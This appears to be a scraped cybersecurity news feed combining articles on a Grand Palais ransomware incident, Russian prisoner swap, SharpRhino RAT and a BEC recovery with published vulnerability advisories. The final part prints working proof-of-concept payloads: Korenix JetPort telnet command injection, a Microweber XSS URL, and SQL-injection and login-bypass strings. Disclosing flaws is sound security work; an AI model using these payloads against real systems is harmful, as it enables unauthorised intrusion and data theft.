Everyone expected some kind of cyberattack during the Olympics. If this is the best they've got, the bad guys don't deserve a spot on the podium.

Source: Alexandre ROSA via Alamy Stock Photo

Overnight on Saturday, Aug. 3, cyberattackers struck the computer systems belonging to the Réunion des Musées Nationaux et Grand Palais (RMN), a French cultural institution that oversees dozens of museums, shops, and exhibitions, as well as around 100 publications.

In its own words, RMN is "neither a museum nor a gallery, but an unidentified creature on the cultural landscape." This summer, its namesake Grand Palais complex has hosted various Olympics-related exhibitions and events, including fencing and Taekwondo competitions.

Between Aug. 3 and 4, RMN fell victim to a purported ransomware attack. Defenders quickly responded, and the organization reported little impact to any of its many related institutions.

France's Anti-Cybercrime Brigade has opened an investigation into the incident. According to the country's penal code, fraudulently accessing a data processing system is punishable by three years' imprisonment, and deleting or modifying the data therein adds another two years on top.

**What (Seems to Have) Happened**

Le Parisien was the first to report that a weekend attack against RMN involved ransomware. The attack targeted the system that centralizes financial data across its various related institutions. It suggested that a cryptocurrency ransom was involved, that data had been exfiltrated, and that organizations like the Louvre were affected.

In an Aug. 6 press release, however, the RMN said it had discovered no signs of data exfiltration. Meanwhile, the Louvre's chief of staff, in a post to X, denied that the attack had affected it.

The Grand Palais director clarified to reporters, "This only concerns our internal network of shops, and not even the other activities of the RMN-Grand Palais. We immediately disconnected everything that was vital and called on the special state unit that deals with this type of problem, the French Computer Security Agency."

RMN noted that even those potentially affected shops "are operating normally, autonomously and the museums and their bookshops remain open to the public under the usual conditions."

**Hackers' Underwhelming Performance at the Olympics**

"Everyone expected the Olympic Games to be the target of cyberattacks," says Dr. Martin J. Kraemer, security awareness advocate at KnowBe4. If this attack was the best the bad guys have got, though, it will have been underwhelming.

"Attackers have used ransomware attacks on other occasions to cover the tracks of something else," Kraemer adds. "This might be the case here. However, it seems more likely that the scheme is a quick exploit and nothing else in this case."

Still, there are five more days of the Olympics to go. "It will be interesting to watch the situation unfold on the world stage," says Josh Jacobson, director of professional services at HackerOne. "There continues to be a significant risk of attacks against the event’s associated venues, attendees, and spectators. Fake ticketing sites, social engineering campaigns or phishing attacks still pose a significant risk until the games end and beyond that."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Cyberattack Strikes the Grand Palais RMN; Impact Appears Limited

At least two Russian nationals serving prison sentences for cybercrime offenses, Vladislav Klyushin and Roman Seleznev, were released as part of the landmark prisoner swap.

Source: Blackboard via Shutterstock

A convicted dealer of credit card accounts and identity documents and a hacker who helped steal sensitive data from companies to inform stock trades were among the eight Russian nationals traded last week to that country's government in exchange for 16 imprisoned Americans and Europeans.

In the most extensive prisoner exchange since the Cold War, the United States and its allies traded eight convicted Russian nationals — including cybercriminals Vladislav Klyushin and Roman Valeryevich Seleznev — for the release of four Americans, five Germans, and seven Russian political prisoners. Since 2017, Seleznev has been serving a 14-year sentence for participating in a massive cyber-fraud ring that stole more than $9 million from banks and $50 million in consumer losses. Klyushin was sentenced in September 2023 to nine years in prison for taking part in a hack-and-trade scheme.

The fact that the two cybercriminals were included in the exchange shows the importance that the Russian government puts on cyber operations, says Waithera Junghae, associate on the incident response team at S-RM, a global corporate intelligence and cyber security consultancy.

"Cyber activity aligns closely with real-world events such as conflict in Russia-Ukraine, and therefore it's perhaps not unsurprising that we see individuals engaged in this activity feature in negotiations and resulting releases," she says.

The massive exchange involved US diplomacy as well as the cooperation of at least five allies: Germany, Norway, Poland, Slovenia, and Turkey. The United States and its allies gained the release of three American citizens, an American green card holder, five German citizens, and seven Russian political prisoners, according to the White House. In addition to the two cybercriminals, Russia freed Vadim Krasikov, previously held by Germany after being convicted of assassinating a Chechen separatist in Berlin, news reports stated.

In remarks on Aug. 1, President Joe Biden stressed that the five countries who helped make the deal possible — either by releasing prisoners or in helping with logistics — showed the importance of the United States' alliance partners.

"They all stepped up, and they stood with us," Biden said. "They stood with us, and they made bold and brave decisions, released prisoners being held in their countries who were justifiably being held, and provided logistical support to get the Americans home. So, for anyone who questions whether allies matter, they do. They matter."

**Cybercriminals Pursued Unique Approaches**

The two cybercriminals released by US authorities included Klyushin, 42, who monetized hacks in an uncommon — if not unique — way. The Russian businessman, who owned the Moscow-based IT-security firm M-13, worked with four other co-conspirators to steal information on corporate earnings from publicly traded businesses, making trades around more than 2,000 "earnings events," according to a statement by the US Attorney's Office for the District of Massachusetts. The scheme netted the group around $93 million.

The "hack-to-trade" scheme is not unique, but it is a rare way for financially motivated cybercriminals to make money, Junghae says.

"Financially motivated cybercriminals typically opt for the quickest and easiest routes to make money, including encrypting and exfiltrating data or engaging in payment diversion schemes," she says. "However, in this particular case, Klyushin's strategy involved hacking companies to obtain confidential information for trading purposes."

Meanwhile, Seleznev — as part of the credit-card theft ring, Carder.su — created an automated portal for selling credit card data, allowing members to log in, search for specific types of account holders and card information, and then purchase the data by checking out. Seleznev, who used the handles Track2, Bulba, and Ncux, was sentenced to 14 years in prison in 2017, following a guilty plea. Law enforcement charged more than 55 individuals related to Carder.su as part of a concerted investigation dubbed Operation Open Market.

The scale and ease of the cybercriminal operation made Selznev, a pioneer at the time, Junghae says.

"High-profile cases like Seleznev's can embolden other cybercriminals, encouraging them to pursue similar activities under the belief that they too can evade detection and prosecution," she says. "The techniques and methods Seleznev employed can be adapted and refined by other criminals, thereby enhancing their capabilities."

**Not a Major Factor for Law Enforcement**

Some international policy experts have argued that the successful negotiated release of legitimately convicted Russian criminals poses a risk: Rogue governments could be incentivized to trump up charges and arrest other nations' citizens. Since 2021, the Biden administration has negotiated the release of prisoners from Russia, Iran, and Venezuela, according to Reuters.

"While it is or would be great to have these individuals released, it underscores how hostage-taking has become a prominent and frequent — if not growing — element of Russian strategy toward the U.S. and the West," Ian Brzezinski, a former US defense official, told Reuters.

Yet, the prisoner exchange will not change how law enforcement agencies pursue and prosecute cybercriminals, S-RM's Junghae says.

"This was an historic move, years in the making, that likely won't be repeated for some time," she says. "So, it would be remiss for countries and their government administrations to base future activity around further negotiated releases."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Russia's Priorities in Prisoner Swap Suggest Cyber Focus

The RaaS group that distributes Hive ransomware delivers new malware impersonating as validly signed network-administration software to gain initial access and persistence on targeted networks

Source: David Chapman via Alamy Stock Photo

An emerging threat group that's made a meteoric rise to the top of the ransomware food chain has a new tool in its arsenal with a novel remote access Trojan (RAT). The group is using the tool in attacks that appear to be targeting IT professionals.

Researchers from Quorum Cyber revealed in a recent blog post that Hunters International, active since last October, is deploying Hive ransomware. The group uses the new malware, dubbed SharpRhino, first to gain access to targeted infrastructure and then to establish persistence and allow attackers to maintain remote access to the device.

SharpRhino compromises systems disguised as the open source network-administration tool Angry IP Scanner through typosquatting domains. Because Angry IP Scanner is open source, attackers can abuse and misuse valid code-signing certificates to make it look like a network admin is downloading software that has a valid certificate but instead is installing the malware, according to the post.

Upon execution, SharpRhino establishes persistence and provides the attackers with remote access to the device, which they then use to launch a typical ransomware attack using Hive ransomware. Hunters International acquired the malware from its original owners, a group that disbanded after it was taken out by international law enforcement soon after its inception.

"Using previously unseen techniques, the malware is able to obtain a high level of permission on the device in order to ensure the attacker is able to further their targeting with minimal disruption," Quorum Cyber threat intelligence analyst Michael Forret wrote in the post.

**Evolution of a Ransomware Group**

SharpRhino demonstrates the progression of Hunters International, a group linked to Russia. In the first seven months of 2024, the group claimed responsibility for 134 attacks. It has quickly risen to ascendance as the 10th most active ransomware group in 2024 thanks to its possession of Hive.

Leveraging the ransomware, the group has positioned itself as a ransomware-as-a-service (RaaS) provider that works with less sophisticated actors to do much of its dirty work, allowing it to spread Hive more quickly. "Being a RaaS provider is highly likely a main cause for their fast rise to notoriety," Forret wrote.

Like many other ransomware operators, Hunters International exfiltrates data from victim organizations prior to encrypting files, then changes file extensions to .locked and leaves a README message guiding recipients to a chat portal on the Tor network for payment instructions.

"The encryptor itself exhibits a sophisticated design, coded in Rust, a programming language increasingly favoured by cybercriminals for its security features, efficiency, and resistance to reverse engineering," Forret wrote. "This tactic is in line with the evolution observed in the ransomware development, with notable examples including both Hive and BlackCat."

**Disguised as Legitimate Software**

The researchers analyzed a sample of SharpRhino that used a valid certificate signed by the J-Golden Strive Trading Co. Ltd. The file that delivered the malware was a Nullsoft Scriptable Installer System (NSIS)-packed executable, a common file that most compression tools like 7-Zip can understand and read, Forret observed.

The installer system establishes persistence by modifying the Run\\UpdateWindowsKey registry with the shortcut for Microsoft.AnyKey, and establishes two directories on the C:\\ProgramData\\Microsoft — called WindowsUpdater24 and another called LogUpdateWindows — to facilitate multiple channels to Hunters International's command and control (C2) as "a fallback mechanism," Forret noted.

"If the folder WindowsUpdater24 and its contents are discovered by a security engine or professional, there exists the possibility that the persistence mechanism will remain, and the device will remain infected,” he wrote.

Ultimately, SharpRhino's purpose in an attack is to give Hunters International persistence and control over a targeted system to "launch a sophisticated ransomware attack" for financial gain, which the group does without prioritizing any sector or region but instead by targeting "via opportunistic means," Forret wrote.

Qurom Cyber included a list of indicators of compromise for SharpRhino so organizations can identify if network administrators accidentally downloaded the RAT instead of the legitimate tool they believed to be deploying. It also provided Mitre ATT&CK Mapping for the RAT's defense and evasion, discovery, privilege escalation, execution, persistence, and C2 processes.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Hunters International Disguises SharpRhino RAT as Legitimate Network Admin Tool

INTERPOL said it devised a "global stop-payment mechanism" that helped facilitate the largest-ever recovery of funds defrauded in a business email compromise (BEC) scam. 
The development comes after an unnamed commodity firm based in Singapore fell victim to a BEC scam in mid-July 2024. It refers to a type of cybercrime where a malicious actor poses as a trusted figure and uses email to

INTERPOL said it devised a "global stop-payment mechanism" that helped facilitate the largest-ever recovery of funds defrauded in a business email compromise (BEC) scam.

The development comes after an unnamed commodity firm based in Singapore fell victim to a BEC scam in mid-July 2024. It refers to a type of cybercrime where a malicious actor poses as a trusted figure and uses email to trick targets into sending money or divulging confidential company information.

Such attacks can take place in myriad ways, including gaining unauthorized access to a finance employee or a law firm's email account to send fake invoices or impersonating a third-party vendor to email a phony bill.

"On 15 July, the firm had received an email from a supplier requesting that a pending payment be sent to a new bank account based in Timor-Leste," INTERPOL said in a press statement. "The email, however, came from a fraudulent account spelled slightly different to the supplier's official email address."

The Singaporean company is said to have transferred $42.3 million to the non-existent supplier on July 19, only for it to realize the blunder on July 23 after the actual supplier said it had not been compensated.

However, by taking advantage of INTERPOL's Global Rapid Intervention of Payments (I-GRIP) mechanism, authorities in Singapore managed to detect $39 million and froze the counterfeit bank account a day later.

Separately, seven suspects have been arrested in the Southeast Asian nation in connection with the scam, leading to the further recovery of $2 million.

Back in June, I-GRIP was used to trace and intercept the illicit proceeds stemming from fiat and cryptocurrency crime, successfully recovering millions and intercepting hundreds of thousands of BEC accounts as part of a global police operation named First Light.

"Since its launch in 2022, INTERPOL's I-GRIP mechanism has helped law enforcement intercept hundreds of millions of dollars in illicit funds," the agency said.

"INTERPOL is encouraging businesses and individuals to take preventative steps to avoid falling victim to business email compromise and other social engineering scams."

The disclosure follows the law enforcement seizure of an online digital wallet and cryptocurrency exchange known as Cryptonator for allegedly receiving criminal proceeds of computer intrusions and hacking incidents, ransomware scams, various fraud markets, and identity theft schemes.

Cryptonator, launched in December 2013 by Roman Boss, has also been accused of failing to institute appropriate anti-money laundering controls in place. The U.S. Justice Department indicted Boss for founding and operating the service.

Blockchain intelligence firm TRM Labs said the platform facilitated more than 4 million transactions worth a total of $1.4 billion, with Boss taking a small cut from each transaction. This comprised money exchanged with darknet markets, scam wallet addresses, high-risk exchanges, ransomware groups, crypto theft operations, mixers, and sanctioned addresses.

Specifically, cryptocurrency addresses controlled by Cryptonator transacted with darknet markets, virtual exchanges, and criminal marketplaces like Bitzlato, Blender, Finiko, Garantex, Hydra, Nobitex, and an unnamed terrorist entity.

"Hackers, darknet market operators, ransomware groups, sanctions evaders and others threat actors gravitated to the platform to exchange cryptocurrencies as well as cash out crypto into fiat currency," TRM Labs noted.

The popularity of cryptocurrency has created plenty of opportunities for fraud, with threat actors constantly devising new ways to drain victims' wallets over the years.

Indeed, a recent report from Check Point found that fraudsters are abusing legitimate blockchain protocols like Uniswap and Safe.global to conceal their malicious activities and siphon funds from cryptocurrency wallets.

"Attackers leverage the Uniswap Multicall contract to orchestrate fund transfers from victims' wallets to their own," researchers said. "Attackers have been known to use the Gnosis Safe contracts and framework, coaxing unsuspecting victims into signing off on fraudulent transactions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

INTERPOL Recovers $41 Million in Largest Ever BEC Scam in Singapore

A Reflected Cross-site scripting (XSS) vulnerability exists in '/search' in microweber 2.0.15 and earlier allowing unauthenticated remote attackers to inject arbitrary web script or HTML via the 'keywords' parameter.

**Microweber Reflected Cross-site scripting (XSS) vulnerability**

Moderate severity GitHub Reviewed Published Aug 6, 2024 to the GitHub Advisory Database • Updated Aug 6, 2024

GHSA-m99v-mmg2-66vf: Microweber Reflected Cross-site scripting (XSS) vulnerability

The AI boom and increasing popularity of quantum computing necessitates quantum-resilient security.

David O'Berry, vCISO Cyber Resiliency and Enterprise Converged OT/IT/IIoT Cyber, North America Cybersecurity Practice, Capgemini

August 6, 2024

4 Min Read

Source: Science Photo Library via Alamy Stock Photo

COMMENTARY

Quantum computing has been projected to enable market-defining and life-changing capabilities since its inception more than three decades ago. From financial portfolio optimization and improved electric vehicle (EV) battery production to enhanced drug discovery and advanced semiconductor manufacturing, quantum computers can perform complex calculations at faster speeds than both traditional and super computers. 

Thanks to the recent artificial intelligence (AI) boom, quantum computing is predicted to become even more significant in the coming years. Quantum computers will facilitate advancements in AI algorithms — better known as quantum AI or QAI. These quantum-enabled AI models will be faster as well as more accurate and efficient, due to quantum computers' parallel processing abilities that can simultaneously solve complex problems and prepare large datasets. This also means that quantum computing can deliver more energy-efficient AI algorithms, as well as hybrid architecture, neural network-enabled data modeling, and improved AI and data security.

Despite the positivity surrounding quantum computing, there is also a dark side to this burgeoning technology. Cybersecurity criminals are increasingly using quantum computing techniques to attack enterprises and break encryptions. It is believed that in the next five to 10 years, quantum computers will be able to break the majority of today's cryptographic algorithms.

This reality leaves corporate leaders and cybersecurity experts with one choice — prepare for the future of post-quantum cryptography (PQC) before it's too late.

**Current State of Post-Quantum Cryptography**

Encryption has been a highly divisive cybersecurity tool in the United States for several decades. In fact, if it was not for the work of experts like Phil Zimmerman catalyzing public-private discussion during the Crypto Wars, we could be living in a more vulnerable world, where encryption was still widely outlawed. 

Fortunately, after years of debate and a growing onslaught of concerning cyberattacks, cryptography is now a broadly accepted security technique, backed by the US government. Encryption is used to protect everything from emails to cryptocurrencies to private wireless networks. However, of all the cryptographic applications, post-quantum cryptography in particular is now the gold standard.

In 2022, Congress passed the Quantum Computing Cybersecurity Preparedness Act to ensure all federal entities will have quantum-resilient plans and technology in the coming years. The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and National Institute of Standards and Technology (NIST) also collectively developed the "Quantum Readiness: Migration to Post-Quantum Cryptography" information sheet last year, to advise US defense agencies and private enterprises alike on the new reality of cybersecurity in our post-quantum world. 

This surge in PQC legislation is largely due to the fact that most of our existing encryption is weak and cannot withstand a quantum-enabled attack. And while there is some work being done to advance quantum-proof algorithms, it is not nearly enough. Organizations across industries will be subjected to quantum-led attacks, including government agencies, financial and insurance enterprises, government suppliers — such as aerospace and defense companies — and corporations managing critical infrastructure like telcos and utilities. In other words, PQC is a matter of national security and personal privacy. 

**Bolstering Unbreakable Security**

Cyber leaders have always been tasked with preparing for the unpredictable, but now perhaps for the first time, they must prepare for the unknown. Cyber teams have limited knowledge of both quantum-enabled attacks and quantum-resistant encryption. So how can leaders across sectors bolster their defenses in the unfolding era of PQC?

To start, preparations should begin with risk assessments and inventories to help organizations understand where they have cryptographic gaps. Cyber teams should ask themselves where and how they are using encryption. Moreover, they should identify the various kinds of encryption algorithms and their current use cases across the enterprise. This will, in turn, help companies achieve crypto agility across systems. 

Leaders must also enable a cultural and technological reset. Most cybersecurity professionals will need to be trained to identify, mitigate, respond to, and even predict and prevent quantum-driven threats. These upskilling and reskilling initiatives will typically require third-party support from cyber vendors with deep expertise in quantum technologies.

In order to ultimately protect data and secure AI models using post-quantum cryptographic protocols, algorithms, and systems, organizations will also have to revamp their key management strategy, public key infrastructure deployments, and certificate life cycle management practices. 

The AI boom and increasing popularity of quantum computing necessitates quantum-resilient security. The US government has seen the writing on the wall — and now, enterprises must meet the unknown head-on as well. 

**About the Author**

vCISO Cyber Resiliency and Enterprise Converged OT/IT/IIoT Cyber, North America Cybersecurity Practice, Capgemini

David currently leads the vCISO Practice for the Converged OT/IT, Enterprise, and Cyber Resilience Towers for the North America Cybersecurity Practice at Capgemini. In this role, David also works on the creation of Capgemini’s Cybersecurity Delivery Center of Excellence in North America. Most recently, David served as the chief architect for a large North American utility, helping to lead a $100 million-plus cybersecurity transformation initiative. David has more than 30 years of experience in IT, OT, converged IT/OT, network security, and consulting services.

Preparing for the Future of Post-Quantum Cryptography

Korenix JetPort Series version 1.2 suffers from insufficient authentication, command injection, and plaintext communication vulnerabilities.

CyberDanube Security Research 20240805-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities in JetPort Series  
              product| Korenix JetPort Series  
   vulnerable version| 1.2  
        fixed version| None  
           CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397  
               impact| High  
             homepage| https://www.korenix.com/  
                found| 2024-04-01  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The configuration service on port 600/tcp doesnt require authentication to be  
used. This allows an attacker to change the password or other critical  
information.

2) Plaintext Communication (CVE-2024-7396)  
The communication of the configuration service is transmitted in plain text.  
An attacker could use this information to sniff passwords or other critical  
information.

3) Unauthenticated Command Injection (CVE-2024-7397)  
An attacker with network access an can execute arbitrary commands as root user  
via the management service on port 600/tcp.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The management software JetPort Commander is used as an frontend for the telnet  
service on 600/tcp. While it is possible to set a password, the passwords gets  
sent to the software in cleartext and gets validated on the client software  
rather than on the device. An attacker can bypass the management software by  
using telnet to directly connect to the port. This allows him to reconfigure  
the device including passwords and access controls.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setpassword poc

target:/$ cat /tmp/com2ip.conf  
version:1.2.0  
model:JetPort5601v3  
name:JetPort5601v3-DEFAULT  
serialno:0000000000000000  
password:poc  
switchmode:redundant  
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)  
The management service uses telnet as protocol. We used tcpdump to inspect the  
traffic during a password change. The new password (newpass) is readable during  
transmission.

# sudo tcpdump -i virbr0 dst port 600 -X  
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21  
      0x0000:  4500 003d 16a7 4000 8006 6d86 c0a8 7af0  E..=..@...m...z.  
      0x0010:  c0a8 7a4c c1c0 0258 522b 6096 12eb 337d  ..zL...XR+`...3}  
      0x0020:  5018 4026 76bd 0000 7365 7470 6173 7377  P.@&v...setpassw  
      0x0030:  6f72 6420 6e65 7770 6173 730d 0a         ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)  
The management service on port 600/tcp is used to configure JetPort devices  
over the network. An attacker can inject arbitrary commands in multiple  
settings options. The binary ser2net receives the data via the telnet  
protocol and translates it to arguments for system() calls. For our PoC we  
used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1  
OK  
->

target:/$ ls -rtlha /tmp/  
drwxrwxr-x   17 root     0            1.0k Apr  4 10:41 ..  
-rw-r--r--    1 root     0               4 Apr  4 12:28 thttpd.pid  
-rw-r--r--    1 root     0             712 Apr  4 12:29 com2ip.conf  
-rw-r--r--    1 root     0               0 Apr  4 12:33 pwned  
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.

Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends customers from Korenix to remove the device from their  
network topology.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.  
2024-05-07: Received confirmation that the issue is beeing looked into.  
2024-06-10: Contact stated that the product is considered EoL and will no  
            longer receive security updates.  
2024-06-10: Confirm receipt and telling them that we will publish the  
            advisory after our 90-days deadline.  
2024-08-05: Publication of the Advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF Sebastian Dietz / @2024

Korenix JetPort Series 1.2 Command Injection / Insufficient Authentication

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

    # Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)# Date: 16.07.2024# Exploit Author: Prerak Mittal# Vendor Homepage: https://microweber.org/# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15# Version: <=v2.0.15# Tested on: Ubuntu 22.04# CVE : CVE-2024-40101# Description:## App Installation:1. Clone the repository and build the application using docker:```git clone -b v2.0.15 https://github.com/microweber/microweber.gitcd microweberdocker compose up -d```2. Visit http://localhost3. Follow along the UI installation process.## Steps to reproduce:1. Visit http://localhost/search2. Insert the below payload in `keywords` parameter:  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

Microweber 2.0.15 Cross Site Scripting

eduAuthorities version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: eduAuthorities-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 07/29/2024## Vendor: https://www.mayurik.com/## Software:https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The editid parameter appears to be vulnerable to SQL injection attacks. Thepayloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were eachsubmitted in the editid parameter. These two requests resulted in differentresponses, indicating that the input is being incorporated into a SQL queryin an unsafe way. Note that automated difference-based tests for SQLinjection flaws can often be unreliable and are prone to false positiveresults. You should manually review the reported requests and responses toconfirm whether a vulnerability is actually present.Additionally, the payload (select*from(select(sleep(20)))a) was submittedin the editid parameter. The application took 20011 milliseconds to respondto the request, compared with 3 milliseconds for the original request,indicating that the injected SQL command caused a time delay.The attackercan get all information from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: #1* (URI)    Type: boolean-based blind    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#UiVZfrom(select(sleep(3)))a)    Type: UNION query    Title: MySQL UNION query (random number) - 3 columns    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962UNION ALL SELECT8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)---```## Reproduce:[href](https://www.patreon.com/posts/eduauthorities-1-109562178)## More:[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)## Time spent:00:37:00

eduAuthorities 1.0 SQL Injection

Concert Ticket Reservation System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ======================================================================================================================================================| # Title     : Concert Ticket Reservation System v1.0 Auth By Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                            || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                     || # Vendor    : https://download-media.code-projects.org/2020/04/Concert_Ticket_Ordering_System__IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip  |======================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/ConcertTicketReservationSystem-master/profile.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#auth